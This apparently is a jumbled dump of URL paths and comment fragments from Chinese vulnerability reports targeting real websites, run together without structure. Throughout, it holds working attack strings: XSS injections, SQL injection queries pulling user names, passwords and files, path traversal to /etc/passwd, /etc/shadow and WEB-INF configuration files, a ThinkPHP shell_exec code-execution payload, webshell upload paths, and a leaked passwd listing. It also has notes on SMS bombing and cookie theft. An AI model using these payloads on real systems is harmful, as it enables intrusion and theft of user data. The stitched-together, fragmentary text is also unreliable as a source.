ifeng.com /commodity/ /index.php?sid=39591&lang=index.ph /s.htm?word=%3Cscript%3Ealert%28%2Fxss%2F%29%3C%2Fscript%3E /cbportal/userprofile/getSmsVeriCode.htm?userid=""&username=""&mobile=""&veriCode= /ajax/ajax_order.php?type=send_authcode&mobile=你手机号码 /umpay/manage/index.htm 
/forum/login.php?app=backyard&ip=203.187.187.130&key=599f2e40d49c8e9d47563c0b42fdaa5e×tamp=1197853827&u=http%3A%2F%2Ftool1.web.lfc.qihoo.net%2Fforum%2Fbak_index.html /Admin/Base/ /supsite/ /kaoqin/login.php /m/3398041534 /m/3398041534/#javascript:alert%28document.cookie%29%3B /home /home#javascript:alert(document.cookie);可见效果。) /m/\d+ /.+ xxxx /mblog/pic/20125_2_12/s_90649467295126824.png',a /mblog/pic/20125_2_12/s_123.png',a report.sinaapp.com/1.js /login.jsp?msg=%3C/td%3E%3Cscript%3Ealert%28%27changyou%27%29%3C/script%3E&url=category.jsp?gameId=1445&gameId=1445&gameId=1445&loginType=2 /passpod/tlpoint/passpodpay.jsp /manage.htm?TypeID=1 /manage.htm?TypeID=1 /zzbj/card页面中的选择服务器参数未进行过滤,导致post型sql注入漏洞,获取用户信息,包括身份证等等,并能进行脱裤操作。 /left.aspx /webadmin/MSList.aspx /Manage/EcFreight/EcShip_ProductCatFreightTypeMapList.aspx /webadmin/ActJoinPeoplesList.aspx这个页面的用户名,369页很吃力,分析用户找到了几个比较敏感的内部用户,登陆http://manage.coo8.com/这个就不好了。 /zzbj/card处,服务器参数server_id未进行过滤,可导致post型的sql注入。 /TRSSearcher/q?s=%3Cembed%20src=http://tmxk.org%3E /data/attachment/forum/201205/02/145451jnukk355o535gkd5.jpg /的一项搜索技术,被广泛应用。输入特殊字符它会报错,并不做过滤返回特殊字符,这样就构成了XSS。该公司网站本身存在XSS: /TRSSearcher/q?s=%3Cembed%20src=http://tmxk.org%3E /index.php?hostID=1 /specapp/Examples/ /WEBSITE3/DEFAULT.ASPX /home.html /upload.fcgi?pagetype=addphotoflash&hostid=259069614&tick=994e56351beec4af07903b240a62b408&block_index=0&block_count=1&uploadid=fileIte"/ /restServer.php?method=Code.checkCode_jsonb&check_code=zdt9&callback=%22/%3E%3Cscript%3Ealert%28/goderci/%29%3C/script%3E /list.php?pid=39 / /video.html#showdiv /RestAPI?method=api.base.getLoginUser&format=2&callback=%22/%3E%3Cscript%3Ealert%28/goderci/%29%3C/script%3E /service.do?template=api.com.login&format=jsonp&callback=jQu //content.airchina.com.cn) a.tudou.com/specapp/Examples/Autoindex/index.php / /plus/1.php /draw/tuyashow.php?t=xianger9527 /exec/movie_view.php?id=r34t6llj&viewid=23919 /Hotel-Info.php?ShopID=258 
/index.php?mod=net&hash=wooyun.org&name=%3Cscript%3Ealert('wooyun.org')%3C/script%3E /db/dn/cat.php?id=daoju&w=%27/%3E%3Cscript%3Ealert%28/baidu/%29%3C/script%3E /db/dn/cat.php?id=zhuanbei&w= /注册帐号,然后填写需要查询的身份证号码以及姓名, /friend.php?ids=1599913322 /htcwildfire/friend.php?id=1599913322 /login.php?url=http%3A%2F%2Fweibo.com%2Fu%2F17751354XX,后面的17751354XX为我的微博id值。只要修改后就可以增加自己的粉丝。 /www/fuwuwangdian_list.php?lang=&id=860991 /admin /news/2012/0504/249657.shtml /utility/dict.php?from=qg&wv=2&sid=&fromid=1 /jt/ /vuldb/ssvid-30092 /jt/phpsso_server/api/uc.php?code=39caGV14OJvYIjY1cPl2mwf%2FMku60BPKoUK9HQsO91pn9q60Lw1rV9OCpFDsAtB433jiyC6PFY9pO1Dq8PnbaBdPrD8V1o1knpUsbuYejS58Hr8 /51javacms/PluginCtrl?page=DownLoadFilePage&path=/download&name=../../../../../../../../../../../etc/shadow /query_list.asp?name=%BA%D3%C4%CF%D6%A3%D6%DD%B9%AB%CB%BE / www.jszj.com.cn / /decor/fitmentphoto/search_writing.php?php?keytype=&keywords=%'union%20select%201,2,3,4,5,6,user(),8,database(),10,11,12,13,14,15,16,17%23 /blog/api/artedit.php /2014387123/78111bb333001c4o.html /red/.svn/text-base/minisite.php.svn-base / /auc/setup/setup_company_new.jsp /auc/merge/mail/file.jsp /upfiles/inc.asa /twnew/twnew_w/cfly/edit/upload.aspx?n=1110137649 /5107/chat/chat.php /5107/upload/screenImagesSave.php?filename=php.php /data/files/20120506/php.php /ws/cal/1/GET_JOURNALS?bn=MNGj0rVMNctpcbO^pZoQTw--&UID=301&RETURN_R=Y&RETURN_COMPONENT=true /server-status/ /server-status/ /server-status/ /server-status/ 202.108.33.34/server-status/ /server-status/ /server-status/ /admin/selectmag_list.php?act=getdaodu&id=18091&pid=24034存在sql注入漏洞 /admin/selectmag_list.php?act=getdaodu&id=18091&pid=24034 /5107/upload/screenImagesSave.php?filename=xx.php / /search?q=inurl:/5107/upload/upload.php&hl=en&noj=1&prmd=imvns&ei=E12mT4ugCcKjiQf7ofnHAw&start=10&sa=N&filter=0&biw=1366&bih=618 /login.asp为联通广州公司的销售管理系统,其中对uname值没有进行过滤处理,直接可以进行post型的sql注入。 DelComment(1719) DelComment(1717) 
/data/attachment/forum/201205/07/1631501vdlyx33l4d44krl.jpg /, /data/attachment/forum/201205/06/1844045mg3q96bvsj3eojn.jpg / /bnms/index.do / /clientva/web/p2p/fid_noseeder.php?date=2012-05-06%3Cscript%3Ealert(/xss/)%3C/script%3E /clientva/web/p2p/show.php?date="or /clientbeop/web/ /static/ludi/control/ /static/ludi/control/ /static/ludi/control/ /static/ludi/control/ /static/ludi/control/ /static/ludi/control/ /static/ludi/control/ /static/ludi/control/ /static/ludi/control/ /ssid%3D0/from%3D0/bd_page_type%3D1/pu%3Dat%401%2Cgt%40111111_0_0/uid%3Dwapp_1336062356514_634/soft?ext=&action=cgcate&cid=5b9a7042a40046c54&f=cindex(百度应用-分类)页面中,用户提交的数据没有经过过滤,导致可以执行js代码。 /ssid%3D0/from%3D0/bd_page_type%3D1/pu%3Dat%401%2Cgt%40111111_0_0/uid%3Dwapp_1336062356514_634/soft?ext=&action=cgcate&cid=5b9a70 /ssid%3D0/from%3D0/bd_page_type%3D1/pu%3Dat%401%2Cgt%40111111_0_0/uid%3Dwapp_1336062356514_634/soft?action=cgtophot&ext=&t=topnew /ssid%3D0/from%3D0/bd_page_type%3D1/pu%3Dat%401%2Cgt%40111111_0_0/uid%3Dwapp_1336062356514_634/soft?action=cgtopicindex&ext=&f=cgcateindex /ssid%3D0/from%3D0/bd_page_type%3D1/pu%3Dat%401%2Cgt%40111111_0_0/uid%3Dwapp_1336062356514_634/soft?action=cgcate&cid=5b9a70%22%3E%3Cscript%3Ealert%28%E2%80%98ali%E2%80%99%29%3C%2Fscript%3E42a40046c54&ext=%2Cs%402 /qzone/v5/toolpages/fp_utf8.html /wooyun2)微博中转发了36氪的某微博,然后手戝点了一下,看到36氪的主页(http://www.36kr.com/),WordPress程序,没搞头呀(手上有oady的可以wooyun一下),于是试试渗透吧。于是看到投资人服务那里有个分站链接:http://vc.36tr.com/ /avatar_image/20120507/11/34/90/n1336371610158.gif 6.0 /product/new/step3/1429 /pdf/ /Learningspace/test/student/zkz_print.asp?studentid=xxx&TestID=xxx,修改studentid和TestID,即可查看其他考生的准考证信息 /shtml/mobile_01.jsp.bak /.svn/entries /application/.svn/entries /system/.svn/entries /doc/.svn/entries /user_guide/.svn/entries /public/.svn/entries /netshop/check_tel.asp,由于这个页面是调用js的,并不是在此页面写的js,所以我们使用正常手机验证,验证完了 pc.ijinshan.com/source/.svn/entries pc.ijinshan.com/js/.svn/entries /indexSon.php?-s /plus/list.php?-s /index.php?-s /index.php?-s 
/bdetail.php?-s /?-s /index.php?-s /product.php?-s /index.php?-s /home.php?-s /?-s /index.php?-s /index.php?-s /news.php?-s /index.php?-s /index.php?-s /index.php?-s /index.php?-s /index.php?-s /city_caigou.php?-s /index.php?-s /index.php?-s /index.php?-s /cn/index.php?-s /all.php?-s /cn/index.php?-s /products.php?-s 113.106.100.60 href="#b"/ href="#abc href="#use"/ /UploadFile/ /UploadFile/ActivitiesExcel/ /UploadFile/ActivitiesFile/ActivitiesProgram/ /news/safe/895/20120228/17059956.html /jiancai/dealer/ajax/MobileCheck.aspx?action=MobileSendCode&mobile=手机号 /s?wd=site%3Awww.airmarket.com.cn&pn=50 /zzcx/search.asp?offset=1640 /xfzsw/weiquan_detail.asp?weiquanid=34 /daili/ding.asp?uid=93&id=4364 www.dahe.cn / / / / / / /service/v7846/ / / / / / / / /Action/ValidMobileCode.aspx?&action=SendCode&CodeType=1&phone=手机号 /wulin2/wlrangergrace/wlRangerCommentPage.action?imgid=22440 /wulin2/wlcaptor/wlCaptorRun.action?id=885 /nokia/index.php?parentid=7&groupid=0,文章也可以随便改 /opt/sites/qq__park/apps/ /usr/bin/python 2.7.2 /subject/wap/wap.aspx获取验证码,然后使用这个验证码就可以无限发送验证短信了 /subject/wap/WapHandler.ashx?requestNum=1&refid=6928722&moblie=136xxxxxx00&valcode=7023&iid=0.02490099416196369 / /cbs_xx.php?cbs_id=415 /0pgtest/pxb/backlogin.asp这里注入登陆上传配合列目录,获得webshell。 /prog/wapsite/sports/data/teaminfo.php?league_type_id=7&team_chinese=江苏舜天&team_id=30,注入漏洞 /cnvd/template/cnvd_advance_search_result.jsp /Plone /manage www.域名/thirdparty/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp /zsff/2011/tj2011_1.asp /zsff/2011/sj2011_1.asp /zsff/2011/zcpg2011.asp / /resume/resumeattach/other/201205/20120509_050149_13.php /digi/cgi-bin/search.php?style=1&module=search /search/search.php?style=1&module=compsea1&manu_name= /comment/skin/default.html /phpcms2008/phpcms/yp/product.php?catid=1&areaname=555%27%20and%20extractvalue%281,concat%280x09,%28version%28%29%29%29%29%20and%20%271%27=%271 /v/phpcms/yp/product.php?prowhere=1%27 /河南省电监会 
/admin/adminlogin.asp /nmsframe/nmsframeinstall/ /myNew/main.php?mode=service&doaction=myValueAdd / /(你的ID)#//status/status?id=(对方ID) /index.php/Index/news_page/id/%7B$%7Bphpinfo%28%29%7D%7D /index.php/Index/news_page/id/%7B$%7B@print%28shell_exec%28chr%28108%29.chr%28115%29.chr%2832%29.chr%2845%29.chr%2897%29.chr%28108%29%29%29%7D%7D /Public/uploadfiles/ok.php /server-statu /manager/html /view.php?action=company&info=143983 /zhaopin/downLoadFile.do?path=school&key=attachments/../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00&genFileName=132000301eba4605f4c82b137babd890ed1c40593.zip /tags/att_script_defer.asp /sys/ /MessageList.aspx?id=16467存在注入。 /esf.aspx?lx=3&pathid=204 /xbnet-manager/upload/upload_pic.htm /logreport/awstats.pl?config=1EF226FFFFF511D118 /wxcs/ppo/YC/index.php/Public/MedInsurance/1/%7B$%7Bphpinfo()%7D%7D / /bug.php?action=view&id=248 /show_news.asp?bh=239 /GB/content.php?nid=46 /GB/content.php?nid=46 /GB/content.php?nid=46 /home.php/Index/getmodle/factoryid/%7B$%7Bphpinfo()%7D%7D /view/279020.htm /gzticket/jsp/ /gzticket/jsp/login/index.html /gzticket/jsp/log.jsp funcVec.size=2 funcVec.size=2 funcVec.size=2 funcVec.size=1 funcVec.size=1 funcVec.size=1 funcVec.size=1 funcVec.size=2 funcVec.size=1 funcVec.size=1 funcVec.size=2 funcVec.size=2 funcVec.size=2 funcVec.size=1 funcVec.size=1 funcVec.size=2 funcVec.size=3 funcVec.size=2 funcVec.size=2 funcVec.size=2 funcVec.size=2 funcVec.size=1 funcVec.size=1 funcVec.size=2 funcVec.size=2 funcVec.size=1 /apps/track/homeView?originUrl=http://www.163.com /apps/track/homeView?originUrl=%68%74%74%70%3a%2f%2f%77%77%77%2e%31%36%33%2e%63%6f%6d /yw.php?cid=93 /yw.php?cid=93 /yw.php?cid=93 x:0:0:root:/root:/bin/bash x:1:1:bin:/bin:/sbin/nologin x:2:2:daemon:/sbin:/sbin/nologin x:3:4:adm:/var/adm:/sbin/nologin x:4:7:lp:/var/spool/lpd:/sbin/nologin x:5:0:sync:/sbin:/bin/sync x:6:0:shutdown:/sbin:/sbin/shutdown 
x:7:0:halt:/sbin:/sbin/halt x:8:12:mail:/var/spool/mail:/sbin/nologin x:9:13:news:/etc/news x:10:14:uucp:/var/spool/uucp:/sbin/nologin x:11:0:operator:/root:/sbin/nologin x:12:100:games:/usr/games:/sbin/nologin x:13:30:gopher:/var/gopher:/sbin/nologin x:14:50:FTP /var/ftp:/sbin/nologin x:99:99:Nobody:/:/sbin/nologin x:69:69:virtual /dev:/sbin/nologin x:81:81:System /:/sbin/nologin x:74:74:Privilege-separated /var/empty/sshd:/sbin/nologin x:68:68:HAL /:/sbin/nologin x:48:48:Apache:/var/www:/sbin/nologin x:27:27:MySQL /var/lib/mysql:/bin/bash x:38:38::/etc/ntp:/sbin/nologin x:500:50::/opt/www:/sbin/nologin x:501:501::/var:/bin/bash x:0:0::/home/omaoma:/bin/bash /info.php /hot/all?query=%3Cscript%3Ealert%28%27hacked+by+Liuker%27%29%3C%2Fscript%2F /index.action?wc=290000 /try_channel.htm?tab_id=0&look_type=10 /admin/ /manage/index.asp /widget/ /utask/qb/info?callback= /support/faq.htm?partner= / /admin/up.jsp /ebpn/click.html?aid=1000059935001000001&mc=0%5EC100%5EC1000059935001000001%5EC0%5EC147.315%5EC1%5EC150%5EC1336875416%5EC1000000_292555189%7C1%7C1992-01-01%7C20%7C2%7C0086610100000000%7C400000010011_0086610100000000%7C41%7C0%7C0%7C0086610100000000%5EC100000000093%5EC0%5EC%5EC0%5ECrr_REMAIN_2_100%5EC100001%5EC1401815476635733347&refresh_source=3&refresh_idx=0&engine_type=1&ref=http%3A%2F%2Fwww.renren.com%2Fhome&url=http://www.wooyun.org/ /download?filename=2011-06-103288537.pdf&filepath=E:\Tomcat /robots.txt/1.php /index.php/Download/softDown/id/{${phpinfo() /manager/html / /info.php / /ScriptResource.axd?d=hQAnAAAAAAAAAAAAAAAAABBbuFBFK6jR0_azk6DRjgYAAAAAAAAAAAAAAAAAAAAA0 /enews/inforcenter/itdate/itdate.jsp?id=2 /pentest/database/sqlmap /enews/inforcenter/itdate/itdate.jsp?id=2 www.enet.com.cn/session www.enet.com.cn weibo.com /_common/jwplayer/player.swf evt.id evt.client evt.version /_common/jwplayer/player.swf?playerready= /_common/jwplayer/player.swf?playerready= /p/1583718448)。正好拿来突破这种限制了。 /_common/jwplayer/player.swf?playerready= /test3.js 
/_common/jwplayer/player.swf?playerready= /_common/jwplayer/player.swf?playerready= /t4/home/static/swf/img/SinaCollage.swf?JSHandler= /about.aspx?id=09187559-3061-4e1b-bd3c-24e23de714c5 /gg_view.aspx?id=9e3c4a9e-61e5-4a29-bb9d-2fa2a9166048 /news_view.aspx?id=0a77fd53-c7d7-46ca-a456-17e01da20e75 /wjgg_view.aspx?id=91d8409c-bf56-4e21-bcd7-5610e847cf9d /jgyj_view.aspx?id=7621cbf1-859b-41af-9d79-98fbede20fc2 /file/dpt8o212 / /test.php /web_frame/info_html.html /link.php?a=var_dump(3) /txjg/ /ad_1.asp?id=179 /admin/index.asp /hp/ /bb/ / /pmis/factory/ //index.php?act=old&mod=1%3Cdiv%20style%3dwidth%3aexpression%28alert%28document.cookie%29%29%3E&o=2 /flea/size_photo/100x75/2568/2567328.jpg/ /flea/size_photo/100x75/2568/2567328.jpg/ /flea/size_photo/100x75/2568/2567328.jpg/ /flea/size_photo/100x75/2568/2567328.jpg/ /flea/size_photo/100x75/2568/2567328.jpg/ swf taobao.com,找到淘宝域名下的若干FLASH文件。 /static/js/uploader.swf?eventHandler= /static/js/uploader.swf?eventHandler= /static/js/uploader.swf?eventHandler= /up /music/?_a=fmplay&fid=142 /index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D /index.php?s=contactus&a=noticeview&id=33 /xinding/lvbing/includes/sysconf.inc /user_center.php /news/index.jsp?type=HTML&pid=374&id=389 /index.jsp / /ww_bs/bs_info_view_detail.jsp?id=313存在sql注入。 /yunnanlawexam/download.jsp?filepath=D:%5CTomcat-5.5.16%5Cwebapps%5Cyunnanlawexam%5Cweb_manager/infocenter/annexfiles/IC04000000083.doc /dfmczg/publishdate.aspx?id=10014811 /paste/211/raw/ /hd/vip_gift.php alert(document.cookie) alert() / /kj2003/newskin/index.htm /dpool/soft/type.php?b=12 /?do=redirect&site= /?do=redirect&site=test&url= /share?q=a%22%2F%3E%3Cscript%3Ealert%283%29%3C%2Fscript%3E%3C%22 /lyb/list3.jsp?category=3 /lyb/result1.jsp?id=9618 /lyb/allList1.jsp?category=8 /all/index.php /all/index.php /uu/images/indax.php www.rayli.com.cn/mini/party2011/php/config.inc.php /toShop.jsp/Ε?cid=5112&channel=21394&tycourl=//us-r.dipns.net/134 /134/xdf.html /player.swf?debug= 
www.longtailvideo.com /files/flash/player.swf?debug=function(){alert(1) /files/flash/player.swf?debug=function(){var /files/flash/player.swf?debug= appmaker.sinaapp.com/a.js / /EnvAir/portal.aspx /WWaterV020/WWater/WWater.XXXXXWebUI.RMC/Video/HCNetVideoIndex.aspx /en_index.php /html/02/n-1202.html /html/12/n-412.html /scripts/o_code.js /gate/big5/apps.chinataiwan.org/static/qxdl/sub/mrzf.php?sortid=8 /gate/big5/apps.chinataiwan.org/static/qxdl/sub/shscsub.php?sortid=3&parentid=2 /gate/big5/apps.chinataiwan.org/static/qxdl/sub/mxxl.php?offset=1&sortid=20 /grid2008/brief/Libraryresult.aspx /export/flashplayer.swf /export/flashplayer.swf?onFileLoadedError=alert&onPlayPause=alert&autoplay=true&vid=a962553478ba87b54e229f3e&onPlayStart= /detail_rate.htm /rate.htm?user_id=546259XXX /u/xxxxxxx/view/ta_taoshare_list.htm /trade/detail/trade_item_detail.htm /member/user_profile.jhtml /message/add_private_msg.htm?recipient_nickname=马甲 /n/usbU87XEzOyXXXX/front.htm /my_taobao.htm?nekot=133711147XXXXX /trade/itemlist/list_bought_items.htm? 
/jmx-console/ /task.html页面登入,把这个cookis导出(IE浏览器),发送到其他人的电脑,通过ie浏览器导入我发送的cookis.txt文件,仍可进http://lixian.vip.xunlei.com/task.html离线下载页面,在迅雷离线下载新建离线下载任务,取回本地,很容易破解了迅雷离线下载。 / /sinadas.php?type=detail /sinadas.php?type=detail&id=28167%20and%201=2%20union%20select%201,version(),3,4,5,6,7,8,9,10,11,12%20/* /exploits/16019/ /eTax@SH_Management/Login.aspx。 //ilove.msnshell.com。进去一看,投票插件有注入,表名显示是dedecms,用户权限只有USAGE。 /?type= /m?keyfrom= /?keyfrom= /login.z?back_url= /baike /img/about.asp /img/about.asp?/list_T%D0%F4_7.htm /img/about.asp?tid_%B0%FC%D3%CA%BA%AB%B9%FA%B4%FA%B9%BA%B4%BA%D7%B0%B4%F2%B5%D7%C9%C0%20%C0%D9%CB%BF%C5%DD%C5%DD%D0%E4%B0%D7%C9%ABt%D0%F4%20%C5%AE%20%B6%CC%D0%E4%D0%A1%C9%C0%C5%AE%D7%B0%CF%C4%D7%B0.htm /manager/index.php后台泄漏 /inseasonnow/userdish.php?id=3740362 /inseasonnow/userdish.php?id=3740362 //view.php?cid=214&tid=9 //test.php //dianping/index.php?request=site&sid=547&type= //Search/?Page=5&Value= /publisher/status,只要POST一个参数content到接口即可。 /doover.php”,好多好友中招了。 left;display:none /publisher/status /doover.php"/ /service/online.php?action=saveadd /service/online.php?action=saveadd /tssVersion.aspx?cVer=%E6%9C%8D%E5%8A%A1%E9%80%9A%E6%99%AE%E5%8F%8A%E7%89%88 /,无限制登入,里面存储着所有的pdf的期刊论文,要是批量下载。 /logo/CNVDlogo.jpg /logo/CNVDlogo.jpg /toolmao.com/sinamail.htm) 32,9,13,10,12 /logo/CNVDlogo.jpg /jh网站尝试盗取QQ用户密码!成功后利用QQ密码对QQ用户进行聊天记录监控!!! 
/s?flag=WWWSOFTBARCOMWWWSOFTBARCOM /shop/design.htm?siteId=1&sid=71853403 /.svn/entries /.svn/entries /.svn/entries /.svn/entries /.svn/entries /luoke/dakaoyan/work.php对iid参数没有任何过滤导致了sql注入 /vote/show.php?voteid=7 /nationalday09/index.php?page=11 /readjs-guizhou-362384-0.html /2010mini/lephone/list.php /comment/comment.php?action=vote /sites/all/files/ofc_core/open-flash-chart.swf?get-data= /talent/TalentDetail.aspx?c=bb7f3776-61e0-4733-9645-28927d7eebf8 /talent/admin/ vip.astro.sina.com.cn/Zodiac/city.php?province=2 /products/redeem/agent/images/.svn/entries //products/packages/.svn/entries /blog/2012/05/xss-and-csrf-via-swf-applets-swfupload-plupload/ String /public/football_bang.php?p_id=../../../../../../../../../../etc/passwd%00.jpg / www.leho.com /content/239这里给予回复的每位同学 rayli.com.cn /allpage/info.php?artid=526081 /helpCenter.do?itemId=../../WEB-INF/web.xml%00&captionType=whelp /helpCenter.do?itemId=../../WEB-INF/web.xml%00&captionType=whelp /helpCenter.do?itemId=../../WEB-INF/classes/applicationContext.xml%00&captionType=whelp / / /helpCenter.do?itemId=../../WEB-INF/web.xml%00&captionType=whelp /servlet/download?filename=WEB-INF/classes/hetaimall-config.properties /servlet/download?filename=WEB-INF/classes/hetaimall-config.properties /?i=2508 /images/03.jpg /b.js'language='javascript /index.php?team=%B3%A9%CF%EB%CE%B4%C0%B4%Inject_Here%&stick=1&top=0 /view.php?page=23&id=-44596+uNioN+alL+sEleCT+1,2,3,concat(user,0x3a,password),5,6 /info.php /view.php?page=23&id=-44596+uNioN+alL+sEleCT+1,2,3,load_file(0x2f6574632f706173737764),5,6-- /logo/CNVDlogo.jpg /affiliate/WEB-INF/web.xml /affiliate/WEB-INF/struts-config.xml /affiliate/WEB-INF/classes/com/qunar/affiliate/actions/LogonAction.class /affiliate/logon.jsp /affiliate/WEB-INF/classes/hibernate.cfg.xml mysql://l-aff2.隐藏.隐藏.qunar.com/affiliate?characterEncoding=utf-8 /index.php/product/show?id=146 //code /Show/introduce/frmXiangXiXX.aspx?frm=introduce&id=2199 //www1.baidu.com/www.bch.com.cn,明显是因为搜索结果前少了http:// 
/5107/upload/uploadFlash.php / /basicinfo/Aboutus.do?act=list1 /login1.jsp /login.do /system/login!out.action /login.do /login.do /UploadFile/Image/shell.jsp none xxcj.sasac.gov.cn/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector /cms/demo.php?pid=3075&from=874 /show.php?id=喵 /show.php?id=19727--select /show.php?id=12193 /show.php?id=12193-- /news.php?id=32947 /general/workflow/list/print.php?RUN_ID=1467&FLOW_ID=15&PRCS_ID=1&FLOW_VIEW=1&printView=1 /ckfinder/ckfinder.html漏洞页面 /robots.txt /300wan/cms.php/ /voting/cms.php/ /dashi/admin/ /dashi/admin/ / / / / / / /news_type.asp?id=1413 /sqlin.asp写入一句话,密码a /php/loadfile.php?file=/index.php可以下载设备中的文件。 www.tj.chinaunicom.com/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=/ /FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector /FCKeditor/editor/filemanager/upload/simpleuploader??Command=FileUpload&Type=File&CurrentFolder=/ /possible_1/blog/item/fa5d6731f933cb729922ed95.html /cache/nfm/201205181800/js/fm.js /v2/api/?getapi&class=login&tpl=im&tangram=false /js/tangram-base-1.5.2.1.js /cache/nfm/201205181800/js/belatedpng.js /cache/nfm/201205181800/js/monkey-utf8.js /v2/api/?getapi&class=reg&tpl=pp&tangram=false //js/v2RegPage.js?v=201205017 /Login.asp /mail?auth_token=XzmFbWZBRVAFiHNsiqpc&flash_info=1%3C%2ftitle%3E1%22%3E%3Cscript%3Ealert%28/insight/%29%3C/script%3E&_session_id=3b835f59978f064cf4ed19c49e3b1201 /fight_result?flash_info= /gonglue.jsp?pid=WCRTESTINPUT000000 /index.jsp?pid=WCRTESTINPUT000000 /fanBoxWidget?appId=29706&borderColor= /item/search.html?searchValue= /manage/index.aspx /manage/login.aspx /e.rar /database.rar /index.php?rs=../../../../../etc/passwd%00.jpg /han/pic/?kw=111 
/cyportal1.3/downloadtag.jsp?fileName=2012%20%C5%A9%B7%A2%B4%F3%D7%A8%CF%EE%D4%A4%CB%E3%B0%B2%C5%C5%B1%ED.xls&filePath=site/site00/1290475676502/1290475834305/402881482c34fabe012c765a8bbf2076_attachment/402881483536d99d0135c7a7d97b492e/1.xls www.jamcode.org上的页面中的JS创建一个iframe,src为google.com/test.html google.com/test.html中的JS设置了window.name="数据内容 google.com/test.html中的JS*主动*location.replace跳转到jamcode.org/blank.html www.jamcode.org中的JS就可以获取到iframe.contentWindow.name的内容,完成跨域数据的获取。 www.jamcode.org上的页面中的JS创建一个iframe,src为google.com/test.html google.com/test.html中的JS设置了window.name="数据内容 www.jamcode.org在监听到iframe.onload事件之后,JS直接将iframe.src设置成www.jamcode.org/blank.html不必等待iframe中主动跳转,即可将iframe设置成同域的一个页面,并且window.name的数据不会丢失。 /info.php?catid=154&areaid=&posttime=0 /uweb/Schl/viewSchool?sc=1&c=44%20and%201=2%20union%20select%201,2,1,4,5,6,7,8,9,0,1,2%23 /uweb/Schl/viewSchool?sc=1&orderBy=lcsPrice&order=asc /uweb/Search/view?searchKeyWord=d&searchType=1&orderBy=startDate&order=desc /manage/download.jsp?filepath=fujian/1295424820703.pdf /diy/bisai.php?mont_h=2009-05&id=12&type=15&order=zj_vote+desc /web-console/ /music_swf/music_data.php?blogid=-0 /music_swf/music_data.php?blogid=-0 /script/image?key=&action=request。但是这里返回的是一个 Set Key=UnEscape(KS.S("Key"))//漏洞位置,只调用ks.s函数,无其它过滤。 rtitle=lcase(KS.G("rtitle")) Rkey=lcase(KS.G("Rkey")) ChannelID=KS.ChkClng(KS.S("Channelid")) ID=KS.ChkClng(KS.G("ID")) /bj/developer/detail/15998/$id/ /mail?auth_token=XzmFbWZBRVAFiHNsiqpc&flash_info=1%3C%2ftitle%3E1%22%3E%3Cscript%3Ealert%28/insight/%29%3C/script%3E&_session_id=3b835f59978f064cf4ed19c49e3b1201 /fight_result?flash_info= /gonglue.jsp?pid=WCRTESTINPUT000000 /index.jsp?pid=WCRTESTINPUT000000 /fanBoxWidget?appId=29706&borderColor= /item/search.html?searchValue= /Portal/solution_view.htm?viewId=4078B8D23EC5 /index.php/Cont?a_id=12883 /yangguangxingdong/admin/login.php为管理后台地址,其中用户名和密码使用“admin /update/ /xizang_yingwen/big.php?id=87 
/mailstamp/stamp/getStamp.do?userName=xxxxxxxx@163.com&gui=2011&sid=CCqKXJHGVeInaNfXxTGGNxaguWLuIOIN&uid=xxxxxxxx@163.com&host=webmail.mail.163.com&ver=js4&style=21&skin=163blue&color=044fxsscsrf}%3C/style%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3Cmarquee%3Exxxxxxx&mid=1337757949276&subject=sss /cms /CMS/dede/ /downs.action?fileName=5bd49251-1603-40fd-9ce6-8e32a769dabf.doc&filePath=E:%5CTomcat6BackRun%5Cwebapps%5CROOT%5Cinformation/ /mvc?MVC_BUS=CPRegister&MVC_ACTION=NocpReg com:8080 6.0 /mvc?MVC_BUS=CPRegister&MVC_ACTION=NocpReg /certs/6513B59E371497A2FCAF47E6EC495666.jpg /certs/9AFF900FA65CF142E0506EBFC87A23D3.jsp / /login.asp /cms/Manage/Admin/Login.asp /weidadeshiye/Login.asp /jxbc/default.aspx / / /cgi-bin/euro12/vote/forum.cgi?id=809 /cgi-bin/upload/cgi_upload_activex?g_tk=321835484) /img/baidu_sylogo1.gif /img/baidu_sylogo1.gif /img/baidu_sylogo1.gif sinaapp.com/m.js /img/baidu_sylogo1.gif sinaapp.com/m.js /img/baidu_sylogo1.gif /img/baidu_sylogo1.gif xsst.sinaapp.com/m.js //index.php/module/action/param1/$%7B@phpinfo()%7D //index.php/module/action/param1/$%7B@phpinfo()%7D /tts/backAdmin/login.jsp?url=%2Ftts%2FbackAdmin%2F /crs/login.jsp /search.html s=88952634&searchkey=88952634 /说明.txt,打开后,就亮瞎我的狗眼了。管理员把聊天记录、笔记都放在上面了。直接搜索“密码”,“pwd”等字段,意外惊喜。 www.sina.com.cn www.sina.com www.gov.cn,作为政府机构,它的二级域应该为.gov.cn,国务院在申请域名的时候,以www为它的三级域名标识(也可以理解为企业标识),国务院没有设置主机名,所以国务院的全域名地址为www.gov.cn。下面是国务院的whois信息: www.gov.cn三级域标识以上的域名,或者是添加主机,假如我们添加一个上域test,那么全域名为test.www.gov.cn;假如我添加一个名为a的主机,不添加test域,那么这时它的全域名为a.www.gov.cn;假如我在test域以上添加一个名为a的主机,那么全域名地址为:a.test.www.gov.cn。 www.gov.cn了,这个时候,这个用户的全域名就和国务院的域名一模一样。 /getvcode.php /getvcode.php /userreg.htm /?src= /cgi-bin/fl/ring.cgi?r=184626 /cgi-bin/fl/ring.cgi?r=184626 /cgi-bin/fl/ring.cgi?r=184626 /cgi-bin/ja/main.cgi?action=view&id=1 /cgi-bin/fl/show.cgi?id=11499 /cgi-bin/fl/tag.cgi?t=新版 /cgi-bin/nw/main.cgi?cat=470 /?i=2517中提到的向量,测试UC 
